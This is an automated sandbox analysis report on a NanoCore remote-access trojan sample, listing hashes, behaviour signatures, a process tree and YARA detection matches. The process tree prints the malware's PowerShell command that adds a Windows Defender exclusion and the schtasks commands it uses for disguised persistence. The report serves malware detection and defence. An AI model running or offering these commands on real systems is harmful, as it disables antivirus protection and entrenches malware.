Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
U7Ncg7oAyC.exe

Overview

General Information

Sample Name:U7Ncg7oAyC.exe
Analysis ID:623790
MD5:1d2ca2d522f8f4e99609cf7e88e673b4
SHA1:7754eade48451776ab6109a0c584573780a4f531
SHA256:26e6fe6c78632392c446e53eb0779ec99e0864d09265b9dda557763629ef3396
Tags:exeNanoCoreRAT
Infos:

Detection

Nanocore
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Detected unpacking (overwrites its own PE header)
Sigma detected: NanoCore
Yara detected AntiVM3
Detected Nanocore Rat
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for dropped file
Yara detected Nanocore RAT
Connects to many ports of the same IP (likely port scanning)
Protects its processes via BreakOnTermination flag
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Adds a directory exclusion to Windows Defender
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • U7Ncg7oAyC.exe (PID: 6284 cmdline: "C:\Users\user\Desktop\U7Ncg7oAyC.exe" MD5: 1D2CA2D522F8F4E99609CF7E88E673B4)
    • powershell.exe (PID: 6456 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\LYKZypsugb.exe MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 6476 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LYKZypsugb" /XML "C:\Users\user\AppData\Local\Temp\tmp43AF.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 6672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • U7Ncg7oAyC.exe (PID: 6752 cmdline: C:\Users\user\Desktop\U7Ncg7oAyC.exe MD5: 1D2CA2D522F8F4E99609CF7E88E673B4)
      • schtasks.exe (PID: 4132 cmdline: schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp6DAD.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
        • conhost.exe (PID: 1328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • schtasks.exe (PID: 4352 cmdline: schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmp7772.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
        • conhost.exe (PID: 3572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • U7Ncg7oAyC.exe (PID: 2860 cmdline: C:\Users\user\Desktop\U7Ncg7oAyC.exe 0 MD5: 1D2CA2D522F8F4E99609CF7E88E673B4)
    • powershell.exe (PID: 5684 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\LYKZypsugb.exe MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 6168 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LYKZypsugb" /XML "C:\Users\user\AppData\Local\Temp\tmpCCF4.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 6520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • U7Ncg7oAyC.exe (PID: 6568 cmdline: C:\Users\user\Desktop\U7Ncg7oAyC.exe MD5: 1D2CA2D522F8F4E99609CF7E88E673B4)
  • dhcpmon.exe (PID: 5308 cmdline: "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0 MD5: 1D2CA2D522F8F4E99609CF7E88E673B4)
    • powershell.exe (PID: 6944 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\LYKZypsugb.exe MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 1556 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LYKZypsugb" /XML "C:\Users\user\AppData\Local\Temp\tmpE07C.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 6480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • dhcpmon.exe (PID: 640 cmdline: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe MD5: 1D2CA2D522F8F4E99609CF7E88E673B4)
  • dhcpmon.exe (PID: 5256 cmdline: "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" MD5: 1D2CA2D522F8F4E99609CF7E88E673B4)
    • powershell.exe (PID: 6560 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\LYKZypsugb.exe MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 4144 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LYKZypsugb" /XML "C:\Users\user\AppData\Local\Temp\tmpFF8.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 2364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • dhcpmon.exe (PID: 3348 cmdline: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe MD5: 1D2CA2D522F8F4E99609CF7E88E673B4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000006.00000000.298686733.0000000000402000.00000040.00000400.00020000.00000000.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0xff8d:$x1: NanoCore.ClientPluginHost
  • 0xffca:$x2: IClientNetworkHost
  • 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000006.00000000.298686733.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
    00000006.00000000.298686733.0000000000402000.00000040.00000400.00020000.00000000.sdmpNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
    • 0xfcf5:$a: NanoCore
    • 0xfd05:$a: NanoCore
    • 0xff39:$a: NanoCore
    • 0xff4d:$a: NanoCore
    • 0xff8d:$a: NanoCore
    • 0xfd54:$b: ClientPlugin
    • 0xff56:$b: ClientPlugin
    • 0xff96:$b: ClientPlugin
    • 0xfe7b:$c: ProjectData
    • 0x10882:$d: DESCrypto
    • 0x1824e:$e: KeepAlive
    • 0x1623c:$g: LogClientMessage
    • 0x12437:$i: get_Connected
    • 0x10bb8:$j: #=q
    • 0x10be8:$j: #=q
    • 0x10c04:$j: #=q
    • 0x10c34:$j: #=q
    • 0x10c50:$j: #=q
    • 0x10c6c:$j: #=q
    • 0x10c9c:$j: #=q
    • 0x10cb8:$j: #=q
    00000022.00000000.386853119.0000000000402000.00000040.00000400.00020000.00000000.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
    • 0xff8d:$x1: NanoCore.ClientPluginHost
    • 0xffca:$x2: IClientNetworkHost
    • 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
    00000022.00000000.386853119.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
      Click to see the 121 entries
      SourceRuleDescriptionAuthorStrings
      24.2.dhcpmon.exe.43a9e90.10.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
      • 0x467ad:$x1: NanoCore.ClientPluginHost
      • 0x7afcd:$x1: NanoCore.ClientPluginHost
      • 0xaf5ed:$x1: NanoCore.ClientPluginHost
      • 0x467ea:$x2: IClientNetworkHost
      • 0x7b00a:$x2: IClientNetworkHost
      • 0xaf62a:$x2: IClientNetworkHost
      • 0x4a31d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
      • 0x7eb3d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
      • 0xb315d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
      24.2.dhcpmon.exe.43a9e90.10.raw.unpackJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
        24.2.dhcpmon.exe.43a9e90.10.raw.unpackMALWARE_Win_NanoCoreDetects NanoCoreditekSHen
        • 0x46515:$x1: NanoCore Client
        • 0x46525:$x1: NanoCore Client
        • 0x7ad35:$x1: NanoCore Client
        • 0x7ad45:$x1: NanoCore Client
        • 0xaf355:$x1: NanoCore Client
        • 0xaf365:$x1: NanoCore Client
        • 0x4676d:$x2: NanoCore.ClientPlugin
        • 0x7af8d:$x2: NanoCore.ClientPlugin
        • 0xaf5ad:$x2: NanoCore.ClientPlugin
        • 0x467ad:$x3: NanoCore.ClientPluginHost
        • 0x7afcd:$x3: NanoCore.ClientPluginHost
        • 0xaf5ed:$x3: NanoCore.ClientPluginHost
        • 0x46762:$i1: IClientApp
        • 0x7af82:$i1: IClientApp
        • 0xaf5a2:$i1: IClientApp
        • 0x46783:$i2: IClientData
        • 0x7afa3:$i2: IClientData
        • 0xaf5c3:$i2: IClientData
        • 0x4678f:$i3: IClientNetwork
        • 0x7afaf:$i3: IClientNetwork
        • 0xaf5cf:$i3: IClientNetwork
        24.2.dhcpmon.exe.43a9e90.10.raw.unpackNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
        • 0x46515:$a: NanoCore
        • 0x46525:$a: NanoCore
        • 0x46759:$a: NanoCore
        • 0x4676d:$a: NanoCore
        • 0x467ad:$a: NanoCore
        • 0x7ad35:$a: NanoCore
        • 0x7ad45:$a: NanoCore
        • 0x7af79:$a: NanoCore
        • 0x7af8d:$a: NanoCore
        • 0x7afcd:$a: NanoCore
        • 0xaf355:$a: NanoCore
        • 0xaf365:$a: NanoCore
        • 0xaf599:$a: NanoCore
        • 0xaf5ad:$a: NanoCore
        • 0xaf5ed:$a: NanoCore
        • 0x46574:$b: ClientPlugin
        • 0x46776:$b: ClientPlugin
        • 0x467b6:$b: ClientPlugin
        • 0x7ad94:$b: ClientPlugin
        • 0x7af96:$b: ClientPlugin
        • 0x7afd6:$b: ClientPlugin
        30.2.U7Ncg7oAyC.exe.433b041.4.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
        • 0xd9ad:$x1: NanoCore.ClientPluginHost
        • 0xd9da:$x2: IClientNetworkHost
        Click to see the 285 entries

        AV Detection

        barindex
        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\U7Ncg7oAyC.exe, ProcessId: 6752, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

        E-Banking Fraud

        barindex
        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\U7Ncg7oAyC.exe, ProcessId: 6752, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

        Stealing of Sensitive Information

        barindex
        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\U7Ncg7oAyC.exe, ProcessId: 6752, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

        Remote Access Functionality

        barindex
        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\U7Ncg7oAyC.exe, ProcessId: 6752, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
        No Snort rule has matched

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: U7Ncg7oAyC.exeVirustotal: Detection: 43%Perma Link
        Source: U7Ncg7oAyC.exeReversingLabs: Detection: 63%
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeReversingLabs: Detection: 63%
        Source: C:\Users\user\AppData\Roaming\LYKZypsugb.exeReversingLabs: Detection: 63%
        Source: Yara matchFile source: 24.2.dhcpmon.exe.43a9e90.10.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 30.2.U7Ncg7oAyC.exe.433b041.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.dhcpmon.exe.3f3560b.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.U7Ncg7oAyC.exe.44104b0.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 30.0.U7Ncg7oAyC.exe.400000.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.0.dhcpmon.exe.400000.8.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.dhcpmon.exe.4dd04b0.12.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.0.U7Ncg7oAyC.exe.400000.10.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.0.U7Ncg7oAyC.exe.400000.12.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.U7Ncg7oAyC.exe.3aab041.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 24.2.dhcpmon.exe.4414cd0.8.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.0.U7Ncg7oAyC.exe.400000.8.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 30.0.U7Ncg7oAyC.exe.400000.10.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.0.U7Ncg7oAyC.exe.400000.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.0.dhcpmon.exe.400000.10.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 30.0.U7Ncg7oAyC.exe.400000.12.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.U7Ncg7oAyC.exe.4444cd0.10.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.U7Ncg7oAyC.exe.52c4629.9.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.dhcpmon.exe.4d99e90.10.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.U7Ncg7oAyC.exe.4af04b0.10.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.0.dhcpmon.exe.400000.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 24.2.dhcpmon.exe.43e04b0.9.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.dhcpmon.exe.4e04cd0.11.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.U7Ncg7oAyC.exe.4444cd0.10.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.U7Ncg7oAyC.exe.4ab9e90.9.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.U7Ncg7oAyC.exe.52c0000.10.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.dhcpmon.exe.3f3b041.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 30.0.U7Ncg7oAyC.exe.400000.8.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.U7Ncg7oAyC.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.0.U7Ncg7oAyC.exe.400000.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 30.2.U7Ncg7oAyC.exe.433560b.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.U7Ncg7oAyC.exe.3aa07ce.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.U7Ncg7oAyC.exe.4b24cd0.11.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 30.2.U7Ncg7oAyC.exe.433b041.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.0.dhcpmon.exe.400000.12.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.U7Ncg7oAyC.exe.4b24cd0.11.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 30.0.U7Ncg7oAyC.exe.400000.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.dhcpmon.exe.4e04cd0.11.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 24.2.dhcpmon.exe.43e04b0.9.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 24.2.dhcpmon.exe.4414cd0.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 30.2.U7Ncg7oAyC.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.U7Ncg7oAyC.exe.4af04b0.10.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.U7Ncg7oAyC.exe.3aab041.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.dhcpmon.exe.3f3b041.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.U7Ncg7oAyC.exe.44104b0.8.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.dhcpmon.exe.3f307ce.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.U7Ncg7oAyC.exe.52c0000.10.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.U7Ncg7oAyC.exe.43d9e90.9.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.U7Ncg7oAyC.exe.3aa560b.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 30.2.U7Ncg7oAyC.exe.43307ce.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.0.dhcpmon.exe.400000.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.dhcpmon.exe.4dd04b0.12.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000006.00000000.298686733.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000022.00000000.386853119.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001E.00000002.416390532.00000000032E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000022.00000000.389457782.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.519407419.0000000003A99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000027.00000002.453407372.0000000003061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000000.301869693.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001E.00000000.379537717.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000000.300964814.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000022.00000002.429959186.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000022.00000002.432551676.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000027.00000000.422202899.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000027.00000002.450934240.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000022.00000002.432713600.0000000003EE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000027.00000000.420827923.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000027.00000000.419127267.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000000.299335853.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001E.00000002.411971893.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001E.00000002.416870536.00000000042E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001E.00000000.376862241.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.517591077.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000022.00000000.394464414.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001E.00000000.378843242.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000018.00000002.434654746.00000000043A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.521004165.00000000052C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000027.00000000.423439487.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.513680149.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000002.409136026.00000000043D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001E.00000000.373615736.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.419521578.0000000004D99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000022.00000000.393280850.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000027.00000002.453640867.0000000004069000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.310994827.0000000004AB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: U7Ncg7oAyC.exe PID: 6284, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: U7Ncg7oAyC.exe PID: 6752, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: U7Ncg7oAyC.exe PID: 2860, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 5308, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 5256, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: U7Ncg7oAyC.exe PID: 6568, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 640, type: MEMORYSTR
        Source: U7Ncg7oAyC.exeJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Roaming\LYKZypsugb.exeJoe Sandbox ML: detected
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeJoe Sandbox ML: detected
        Source: 24.2.dhcpmon.exe.3b0000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen2
        Source: 30.0.U7Ncg7oAyC.exe.400000.6.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 34.0.dhcpmon.exe.400000.6.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 6.0.U7Ncg7oAyC.exe.400000.4.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 34.0.dhcpmon.exe.400000.8.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 6.0.U7Ncg7oAyC.exe.400000.10.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 6.0.U7Ncg7oAyC.exe.400000.12.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 30.0.U7Ncg7oAyC.exe.400000.10.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 6.0.U7Ncg7oAyC.exe.400000.8.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 34.0.dhcpmon.exe.400000.10.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 19.2.U7Ncg7oAyC.exe.420000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen2
        Source: 30.0.U7Ncg7oAyC.exe.400000.12.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 34.2.dhcpmon.exe.400000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 30.0.U7Ncg7oAyC.exe.400000.8.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 6.0.U7Ncg7oAyC.exe.400000.6.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 6.2.U7Ncg7oAyC.exe.400000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 0.2.U7Ncg7oAyC.exe.b80000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen2
        Source: 34.0.dhcpmon.exe.400000.12.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 30.0.U7Ncg7oAyC.exe.400000.4.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 22.2.dhcpmon.exe.cf0000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen2
        Source: 30.2.U7Ncg7oAyC.exe.400000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 34.0.dhcpmon.exe.400000.4.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 6.2.U7Ncg7oAyC.exe.52c0000.10.unpackAvira: Label: TR/NanoCore.fadte

        Compliance

        barindex
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeUnpacked PE file: 0.2.U7Ncg7oAyC.exe.b80000.0.unpack
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeUnpacked PE file: 19.2.U7Ncg7oAyC.exe.420000.0.unpack
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeUnpacked PE file: 22.2.dhcpmon.exe.cf0000.0.unpack
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeUnpacked PE file: 24.2.dhcpmon.exe.3b0000.0.unpack
        Source: U7Ncg7oAyC.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
        Source: U7Ncg7oAyC.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
        Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\NanoProtectPlugin\NanoProtectClient\obj\Debug\NanoProtectClient.pdb source: U7Ncg7oAyC.exe, 00000006.00000002.519407419.0000000003A99000.00000004.00000800.00020000.00000000.sdmp, U7Ncg7oAyC.exe, 00000006.00000002.517591077.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, U7Ncg7oAyC.exe, 0000001E.00000002.416390532.00000000032E1000.00000004.00000800.00020000.00000000.sdmp, U7Ncg7oAyC.exe, 0000001E.00000002.416870536.00000000042E9000.00000004.00000800.00020000.00000000.sdmp, dhcpmon.exe, 00000022.00000002.432551676.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, dhcpmon.exe, 00000022.00000002.432713600.0000000003EE9000.00000004.00000800.00020000.00000000.sdmp
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeCode function: 4x nop then push dword ptr [ebp-24h]
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeCode function: 4x nop then xor edx, edx
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeCode function: 4x nop then push dword ptr [ebp-24h]
